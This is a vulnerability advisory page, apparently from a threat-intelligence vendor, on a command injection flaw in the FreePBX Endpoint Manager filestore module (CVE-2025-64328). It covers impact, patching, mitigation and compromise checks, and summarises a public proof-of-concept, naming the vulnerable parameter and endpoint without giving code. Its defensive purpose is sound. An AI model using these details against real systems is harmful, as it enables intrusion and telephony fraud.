Skip to main content
Meet us at Black Hat USA 2026— Las Vegas, August 1–6Book a Meeting
Mallory
HighCISA KEVExploited in the wildPublic exploit

OS Command Injection in Sangoma FreePBX Endpoint Manager Filestore Module

IdentifiersCVE-2025-64328CWE-78· Improper Neutralization of Special…

CVE-2025-64328 is a post-authentication operating system command injection vulnerability in Sangoma FreePBX Endpoint Manager, specifically in the Administrative interface’s filestore component. The vulnerable code path is the testconnection workflow through the check_ssh_connect() function. Affected versions are FreePBX Endpoint Manager 17.0.2.36 and later before 17.0.3. Due to insufficient sanitization of attacker-controlled input passed to shell execution, an authenticated known user can inject arbitrary shell commands. Successful exploitation results in command execution on the underlying host in the context of the asterisk user and can be used to establish remote access or deploy follow-on payloads such as web shells.

Share:
For your environment

Are you exposed to this one?

Mallory correlates every CVE against your assets, your vendors, and active adversary campaigns. Know which vulnerabilities matter for you, not just which ones are loud.

ANALYST BRIEF

Impact, mitigation & remediation

What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.

Impact

What an attacker gets, and what they’ve been doing with it.

Successful exploitation allows an authenticated attacker to execute arbitrary OS commands on the FreePBX host as the asterisk user. This can lead to installation of persistent web shells, harvesting of configuration and credential material, modification of PBX settings, creation of backdoor access, abuse of telephony resources such as outbound call fraud, and broader post-compromise activity. The vulnerability has been reported as actively exploited in the wild and was added to CISA’s Known Exploited Vulnerabilities catalog.

Mitigation

If you can’t patch tonight, do this now.

If immediate patching is not possible, restrict access to the FreePBX Administration/Administrative interface to trusted administrators and trusted IP ranges only, ideally behind VPN or management network segmentation. Minimize exposure of the admin panel to the public internet, enforce strong unique credentials and MFA where supported, review and remove unnecessary user access, and monitor for suspicious activity in web roots, cron, SSH configuration, and FreePBX logs. Given reports of persistent post-exploitation web shells, mitigation alone is insufficient for already-compromised hosts; incident response and potentially rebuild from a clean baseline may be necessary if compromise is detected.

Remediation

Patch, then assume compromise.

Upgrade FreePBX Endpoint Manager / filestore module to version 17.0.3 or later, which fixes the vulnerable check_ssh_connect() command injection path. Apply vendor-provided updates promptly across all exposed FreePBX systems. Because active exploitation has been observed, organizations should also investigate for compromise indicators after patching, including unauthorized PHP files/web shells, suspicious cron jobs, unexpected local or FreePBX accounts, SSH authorized_keys modifications, password resets, and tampering within FreePBX web directories and related configuration files.
PUBLIC EXPLOITS

Exploits

1 valid exploit after Mallory filtered fakes, detection scripts, and README-only repos.

VALID 1 / 1 TOTALView more in app
CVE-2025-64328_FreePBX-framework-Command-InjectionMaturityPoCFrameworknucleiVerified exploit

This repository contains a Nuclei template (CVE-2025-64328.yaml) and a README.md describing a proof-of-concept exploit for CVE-2025-64328, an authenticated command injection vulnerability in FreePBX 17's filestore module. The exploit targets the 'testconnection' functionality, specifically the check_ssh_connect() function, allowing an authenticated attacker to inject arbitrary shell commands via the 'key' parameter in a GET request to /admin/ajax.php. The Nuclei template automates exploitation by first authenticating to the FreePBX admin panel and then sending a crafted request that triggers the vulnerability. The README provides a curl-based PoC that demonstrates writing to a file on the server via command injection. The exploit requires valid credentials and network access to the FreePBX admin interface. The repository is structured as a typical Nuclei exploit template with supporting documentation.

mcorybillingtonDisclosed Nov 15, 2025yamlnetwork
EXPOSURE SURFACE

Affected products & vendors

Products and vendors Mallory has correlated with this vulnerability. Open in Mallory to drill down to specific CPE configurations and version ranges.

VendorProductType
Sangoma Technologies CorporationFirestoreapplication
Sangoma Technologies CorporationFreepbxapplication

Vendor-confirmed product mapping. Mallory continuously reconciles this list against your asset inventory.

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets are affected, which adversaries are exploiting it right now, which detections to deploy, and what to do tonight.
Exposure mapping

Query your assets running an affected version, and investigate the blast radius.

Threat actor evidence10

Every observed campaign linking this CVE to a named adversary.

Associated malware11

Malware families riding this exploit, with evidence and IOCs.

Detection signatures2

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

Vendor-by-vendor mapping

Cross-references every affected SKU, including bundled OEM variants.

Social activity45

Community discussion across Reddit, Mastodon, and other social sources.